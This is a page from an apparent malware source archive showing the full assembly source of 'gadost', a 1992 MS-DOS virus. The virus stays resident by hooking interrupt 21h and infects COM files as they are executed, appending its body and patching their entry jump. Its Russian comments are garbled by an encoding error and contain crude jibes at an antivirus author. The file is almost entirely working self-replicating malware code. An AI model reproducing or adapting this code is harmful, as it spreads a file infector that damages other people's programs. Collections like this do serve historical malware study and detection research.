MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.gadost.asm
2021-01-12 17:44:11 -06:00

228 lines
6.4 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;
; <09>¥ª®¬¥­¤ã¥âáï ®âª®¬¯¨«¨à®¢ âì, § ¯ãáâ¨âì ¨ ⮫쪮 ¯®â®¬ à áᬠâਢ âì
; source code. (‚ᥠࠢ­® ‚ ¬ ¢ ­¥¬ à §¡¨à âìáï ¯à¨¤¥âáï :-)).
;
; Œ¨«¥­ìª ï (¬ «¥­ìª ï) £ ¤®áâì, ¬¥à§®áâì, ¤àï­ì, ᪮⨭ ...
;
; ®¡é¥¬, ¢¨àãá, ª®â®àë© § à ¦ ¥â ¢á直¥ â ¬ ä ©«ë ¯à¨ ¯®¯ë⪥ ¨å
; § ¯ãáâ¨âì - ¯®ª  á ä ¬¨«¨¥© .COM, ¦¨¢¥â £¤¥-â® ­  ç¥à¤ ª¥ ¯®¤ ¢¥ªâ®à®¬
; 21-£® ¨­â¥àà ¯â , ­¥ áªà뢠¥â ᢮¥ ⥫® ¦¨à­®¥ ¢ ãâ¥á å, § à ¦¥­­ë¥
; ä ©«ë ®¯®§­ ¥â ¯® èãਪ¥­ã (â ª®© ⨯  §¢¥§¤®çª¨, ¨á¯®«ì§ã¥âáï ã
; ¢®áâ®ç­ëå ­ à®¤®¢ ¤«ï ®âᥪ ­¨ï £®«®¢ë ¨ ¥é¥ ª®¥-祣® ã ¡«¨¦­¥£®
; ᢮¥£®), à á¯®«®¦¥­­®¬ã ¢ 4-®¬ ¡ ©â¥ ®â ­ ç « ,   ᢮¥ ­ «¨ç¨¥ ¢
; ¯ ¬ï⨠¯à®¢¥àï¥â â ª: ª« ¤¥â ¢ AX á«®¢® BABA (¢ á¬ëá«¥, ­¥ â ª®¥
; á«®¢®,   word 0BABAh), ¢ë¯®«­ï¥â 21-¥ ¨­â¥à࠯⮢ ­¨¥ ¨ ᬮâà¨â,
; ¦¥« îâ «¨ íâã ¡ ¡ã 0FACCh. …᫨ ¦¥« îâ, â® á â çª®© ¢á¥ ¯®­ïâ­®.
;
; Copyright (c) 1992, Gogi&Givi International
;
.model tiny
.code
org 0100h
VirPar equ (endvir-StartVirus)/16+2 ; ‘ª®ª  ã ¢¨àãá  ¯ à £à ä®¢
VirLen equ (endvir-StartVirus) ; <20> §¬¥àë ¡îáâ  ¢¨àãá  ¢
; âà¥ã£®«ì­ëå ª¨«®¬¥âà å
gadost:
db 'è' ; …â® ª®¤ CALL
dw StartVirus-$-2 ; € ¥â® ᬥ饭¨¥ ­  StartVirus
db 15,09h ; ˜ãਪ¥­ ¨ ®áâ â®ª ®â mov ah,
int 21h ; € íâ® ¢á¥ ­®à¬ «ì­ë©
ret ; ª®¤ ¦¥àâ¢ë
GoodMessage db '’®¢ à¨é ‹®§¨­áª¨©! ”€Š ž!',13,10,'$'
; <20> ª®áâ­ë© ¬¥áá ¤¦ ¤«ï ¤ï¤¨
; ‹®§¨­áª®£®
StartVirus:
pop si ; <20>â® ç⮡ë 㧭 âì, ªã¤  ­ á
call EntryPoint ; § ­¥á«®
EntryPoint:
pop si ; ‚믨孥¬  ¤à¥á ­ ç «  § à §ë
push ds ; ‘®åà ­¨¬ ¯ àã-âனªã ॣ¨áâ஢...
push es
push si
mov ax,cs ; ‚®ááâ ­®¢¨¬ ᯥàâë¥ ¡ ©âë
mov es,ax ; ¨§ § ¤­¨æë ä ©« 
mov ds,ax
mov di,0100h
add si,RobbedBytes-EntryPoint
mov cx,4
cld ; <20>â® ¢®ááâ ­®¢«¥­¨¥
rep movsb
pop si
mov ax,0BABAh ; <20>஢¥à¨¬, å®âïâ «¨ ¡ ¡ã -
int 21h ; ¢ á¬ëá«¥, ¥áâì «¨ ¬ë
cmp ax,0FACCh ; ¢ ¯ ¬ïâ¨
jne NeedsBaba ; ‚¨¤ âì, å®âïâ ¥¥, த¨¬ãî!
jmp FucksNow ; …¥ 㦥 ®¡à ¡ â뢠îâ
NeedsBaba:
pop es
push es
mov ax,es ; Žâà뢠¥¬ ᥡ¥ á¥­â PSP
dec ax
mov es,ax ; ‘⮫쪮 ¢ ­ è¥© ¯ ª®áâ¨
mov ax,es:[3] ; ¯ à £à ä®¢
sub ax,virpar
mov es:[3],ax
mov bx,es:[1] ; <20>«îá ®¤­  PSP
add bx,ax ; ‚ᥠᢠ«¨¢ ¥¬ ¢ ªãçã
mov es,bx
push ds ; <20>ã, íâ® ¯®­ïâ­®
xor ax,ax
mov ds,ax
mov ax,ds:[21h*4] ; ‡ å¢ â뢠¥¬ áâ àë©
mov cs:[si+Off21-EntryPoint],ax ; ¢¥ªâ®à int 21h
mov ax,ds:[21h*4+2] ; á¬ëá«¥, ®­ ­¥ áâ àë©,
mov cs:[si+Seg21-EntryPoint],ax ; ®­ ¤ ¦¥ «ãçè¥ ­®¢®£®
pop ds
xor di,di ; ‡ á®¢ë¢ ¥¬ ¢ ­ ç «®
push si ; ­¨ç¥©­®£® ᥣ¬¥­â 
sub si,EntryPoint-StartVirus ; £¤¥-â® ­  § ¤¢®àª å
mov cx,VirLen ; ¯ ¬ï⨠­ è¥ £­ãá­®¥
rep movsb ; ⥫®
pop si
push ds ; ˆ áâ ¢¨¬ ­  㪠§ ­­®¥
xor ax,ax ; £­ãá­®¥ ⥫® ¢¥ªâ®à
mov ds,ax ; ¯à¥à뢠­¨ï 21h
mov word ptr ds:[21h*4],Int21Server-StartVirus
mov ds:[21h*4+2],es
pop ds
FucksNow:
pop es ; <20>â® ¢ á«ãç ¥, ¥á«¨
pop ds ; ¯à¥¤«®¦¥­­®© ¦¥­é¨­®©
mov si,0100h ; (¢¨àãᮬ) 㦥 ®¡« ¤ îâ
push si
xor ax,ax ; ‚ᥠ¢®ááâ ­ ¢«¨¢ ¥¬ ª
xor bx,bx ; ï¤à¥­¥ ”¥­¥ - ¨ ¤®¬®©,
xor di,di ; ª ¬ ¬¥
ret
Int21Server:
pushf ; <20>â® ­®¢ë© ®¡à ¡®â稪
push ax ; 21-£® ¨­â 
push bx
push ds
cmp ax,0BABAh ; ’ãâ ¬ë ãáâ ­®¢¨¬ ॠªæ¨î
jne NotTest ; ­  ¯à¥¤«®¦¥­¨¥ ¦¥­é¨­ë
pop ds ; (¨«¨ í४æ¨î)
pop bx
pop ax
popf
mov ax,0FACCh ; <20>â® ­®à¬ «ì­ ï í४æ¨ï
iret ; (â® ¥áâì ॠªæ¨ï)
NotTest:
push cx ; ’ãâ ¬ë ª« áá­® ¨§¢à â¨¬áï,
mov cx,ax ; ç⮡ë ᤥ« âì ¢¨¤, çâ®
xchg cl,ch ; ­ ¬ ᮢᥬ ­¥ ­ã¦­®
xor cl,4Bh ; ®¡à ¡ â뢠âì äã­ªæ¨î EXEC
pop cx ; (—⮡ ‹®§¨­áª¨© £®«®¢ã «®¬ «
jz Exec ; ¨ ç⮡ ã ­¥£® ®çª¨ § ¯®â¥«¨)
jmp NotExec
Exec:
mov bx,dx ; <20>®ª« ¤¥¬ ᬥ饭¨¥ ¨¬¥­¨
; § ¯ã᪠¥¬®£® ä ©«  ¢ BX
SearchZero:
cmp byte ptr ds:[bx],0 ; <20>஢¥à¨¬ ­  §¥àã
je ZeroFound ; €å, ª®­¥æ ¨¬¥­¨!
inc bx
jmp SearchZero
ZeroFound:
sub bx,11 ; —㤥᭮!
push es ; <20>஢¥à¨¬, ¢¤à㣠ª ª®©-
mov ax,cs ; ­¨¡ã¤ì ¯á¨å ¦¥« ¥â
mov es,ax ; § à §¨âì COMMAND.COM
mov cx,11
mov di,offset CommandName-StartVirus
Compare:
mov al,ds:[bx] ; <20>â® ¢á¥ á«®¦­ ï ¨ ­ã¤­ ï
cmp al,es:[di] ; ¯à®æ¥¤ãà  ¯à®¢¥àª¨...
jne NotCommand
inc bx
inc di
dec cx ; ‚ᥠ¯à®¢¥à塞, ¯à®¢¥à塞...
cmp cx,0
jne Compare
pop es
jmp Quit21Server ; —â® ¦ ï - ¤¥¡¨« COMMAND.COM
; § à ¦ âì?!
NotCommand:
pop es ; ’ ¬ ¬ë á®å࠭﫨 祣®©-â 
push ax
push bx ; ‘®åà ­¨¬ ¢á¥, çâ® ¯«®å®
push cx ; «¥¦¨â, çâ®¡ë ­¥ ¯à®¯ «®
push dx
mov ax,3D02h ; Žâªã¯®à¨¢ ¥¬ ª«¨¥­â  (ä ©«)
int 21h
jc EndExec ; <20>뢠îâ ¨ £­ãâë¥ ¯à®¡ª¨
mov bx,ax ; <20>®ª« ¤¥¬ ¯à®¡ªã ®â ä ©«  ¢ BX
mov cx,4 ; •®â¥«®áì ¡ë áç¨â âì 4 ¡ ©â 
mov ax,cs
mov ds,ax
mov ah,3Fh ; ¬¥áâ®, £¤¥ «¥¦ «¨
mov dx,offset RobbedBytes-StartVirus
int 21h ; ᯥàâë¥ ¡ ©âë
jc EndExec
cmp word ptr cs:[RobbedBytes-StartVirus],'ZM'
je CloseFile ; <20>  䨣  EXE § à ¦ âì???
xor cx,cx
xor dx,dx
mov ax,4202h
int 21h ; ‹¥§¥¬ ¢ § ¤­¨æã ä ©« 
cmp ax,1000 ; <20>  䨣  ­ ¬ ä ©«ë ¬¥­ìè¥
jl CloseFile ; 1 ª¨«®?
cmp ax,64000 ; € ⥬ ¡®«¥¥ ¡®«ìè¥ 64
ja CloseFile
sub ax,3
mov cs:[FileSize-StartVirus],ax ; ˜ãਪ¥­  ?
cmp byte ptr cs:[RobbedBytes-StartVirus+3],15
je CloseFile ; ˆª¥¡ ­ !
mov ax,cs
mov ds,ax
mov ah,40h ; ƒ«ã¯ë© ¢¨àãá ஡ª® ¯àïç¥â
xor dx,dx ; ⥫® ¦¨à­®¥ ¢ § ¤­¨æ¥ ä ©« 
mov cx,VirLen
int 21h
xor cx,cx ; ˆ ¢ ­ ç «® ã¡¥£ ¥â, ç⮡ë
xor dx,dx ; JUMP â㤠 ¯®áâ ¢¨âì
mov ax,4200h
int 21h
mov ah,40h
mov dx,offset SuperByte-StartVirus ; ” ©« ­  â® ¨ ä ©«, ç⮡ë
mov cx,4 ; ¢ë§ë¢ âì ¯®¤ª«¥¥­­ë©
int 21h ; ᧠¤¨ ¢¨àãá
CloseFile:
mov ah,3Eh ; ‘¨¥ § ªàë⨥ ä ©«  - ­ ¬
int 21h ; ®­ ¡®«ìè¥ ¢  é¥ ­¥ ­ã¦¥­
EndExec:
pop dx ; Œë â ¬, ª ¦¨áì, á®å࠭﫨
pop cx ; ®¯ïâì 祣®©-â ?
pop bx
pop ax
jmp Quit21Server ; ˆ ¯® ¡ ¡ ¬!
NotExec:
; <20>  á«ãç © á«¥¤ãîé¨å 堬᪨å ࠧࠡ®â®ª
Quit21Server:
pop ds ; —¥¬ ¦¥ ¬ë ⮫쪮
pop bx ; STACK' ­ ­¥ ­ ¯®«­ï«¨?!
pop ax
popf ; …é¥ ¨ ä« £ ¬¨?!!!
db 0EAh
Off21 dw 0000h ; ’ ª ¡ã¤¥â á ª ¦¤ë¬, ªâ®...
Seg21 dw 0000h
RobbedBytes:
mov dx,offset GoodMessage ; <20>â® ¢à®¤¥ ª ª ᯥàâë¥ ¡ ©âë
db 0B4h
SuperByte db 'è' ; € íâ® ­¥ ᯥàâë¥, ­®
FileSize dw 0000h ; ⮦¥ å®à®è¨¥
db 15 ; ˜ãਪ¥­ 
db '=>' ; <20>â® ¤«ï ªà á®âë
CommandName db 'COMMAND.COM<=' ; € íâ® ®â COMMAND.COM
endvir:
end gadost ; ˆ ¢á¥!